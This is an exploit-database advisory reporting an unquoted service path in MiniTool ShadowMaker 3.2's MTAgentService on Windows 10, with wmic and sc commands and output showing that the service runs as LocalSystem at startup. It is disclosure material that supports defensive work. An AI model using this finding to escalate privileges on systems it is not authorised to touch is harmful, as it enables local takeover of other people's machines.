MiniTool ShadowMaker 3.2 - 'MTAgentService' Unquoted Service Path

EDB-ID:

49336

CVE:

N/A




Platform:

Windows

Date:

2021-01-04


# Exploit Title: MiniTool ShadowMaker 3.2 - 'MTAgentService' Unquoted Service Path
# Discovery by: Thalia Nieto
# Discovery Date: 02/01/21
# Vendor Homepage: https://www.minitool.com
# Software Link: https://www.minitool.com/backup/thanks-download.html?v=sm-free&r=download-center/
# Tested Version: 3.2
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10

# Step to discover Unquoted Service Path: 

C:\>wmic service get name, pathname, displayname, name | findstr /i "MTAgentService"

MTAgentService	MTAgentService	C:\Program Files\MiniTool ShadowMaker\AgentService.exe

# Service info:

C:\>sc qc "MTAgentService"
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: MTAgentService
        TIPO               : 110  WIN32_OWN_PROCESS (interactive)
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files\MiniTool ShadowMaker\AgentService.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : MTAgentService
        DEPENDENCIAS       :
        NOMBRE_INICIO_SERVICIO: LocalSystem